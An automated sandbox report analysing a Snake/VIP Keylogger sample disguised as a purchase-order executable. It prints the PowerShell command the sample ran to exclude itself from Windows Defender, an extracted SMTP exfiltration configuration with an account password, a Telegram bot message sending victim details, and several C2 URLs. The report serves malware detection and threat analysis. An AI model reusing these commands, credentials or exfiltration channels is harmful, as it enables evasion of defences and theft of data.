Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order 007823-PO# 005307.exe

Overview

General Information

Sample name:Purchase Order 007823-PO# 005307.exe
Analysis ID:1523135
MD5:89b1330440f5e3cc7fdf662981760845
SHA1:39484bf19c50d51022b3f90361bfd048b1ee1df6
SHA256:2095af004e76f0cf7243b68e868eeb3b9c8c157d632aa785a87a93addf3b75fc
Tags:exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Purchase Order 007823-PO# 005307.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe" MD5: 89B1330440F5E3CC7FDF662981760845)
    • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.3791088512.0000000002A8D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2b7f7:$a1: get_encryptedPassword
                  • 0x2bb04:$a2: get_encryptedUsername
                  • 0x2b615:$a3: get_timePasswordChanged
                  • 0x2b710:$a4: get_passwordField
                  • 0x2b80d:$a5: set_encryptedPassword
                  • 0x2ceb8:$a7: get_logins
                  • 0x2ce1b:$a10: KeyLoggerEventArgs
                  • 0x2ca80:$a11: KeyLoggerEventArgsEventHandler
                  0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x39500:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x38ba3:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x38e00:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x397df:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 27 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ParentImage: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, ParentProcessId: 7488, ParentProcessName: Purchase Order 007823-PO# 005307.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ProcessId: 7652, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ParentImage: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, ParentProcessId: 7488, ParentProcessName: Purchase Order 007823-PO# 005307.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ProcessId: 7652, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 208.91.199.223, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49731
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ParentImage: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, ParentProcessId: 7488, ParentProcessName: Purchase Order 007823-PO# 005307.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ProcessId: 7652, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-01T07:21:02.213042+020028033053Unknown Traffic192.168.2.949711188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-01T07:21:00.644750+020028032742Potentially Bad Traffic192.168.2.949708132.226.247.7380TCP
                  2024-10-01T07:21:01.644807+020028032742Potentially Bad Traffic192.168.2.949708132.226.247.7380TCP
                  2024-10-01T07:21:02.972884+020028032742Potentially Bad Traffic192.168.2.949713132.226.247.7380TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                  Source: Purchase Order 007823-PO# 005307.exeReversingLabs: Detection: 36%
                  Source: Purchase Order 007823-PO# 005307.exeVirustotal: Detection: 31%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Purchase Order 007823-PO# 005307.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49710 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49728 version: TLS 1.2
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: XpkT.pdb source: Purchase Order 007823-PO# 005307.exe
                  Source: Binary string: XpkT.pdbSHA256h! source: Purchase Order 007823-PO# 005307.exe
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 4x nop then jmp 0296F8E9h6_2_0296F630
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 4x nop then jmp 0296FD41h6_2_0296FA88

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.9:49731 -> 208.91.199.223:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49713 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49708 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49711 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.9:49731 -> 208.91.199.223:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49710 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 01 Oct 2024 05:21:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1350435179.000000000285E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20a
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
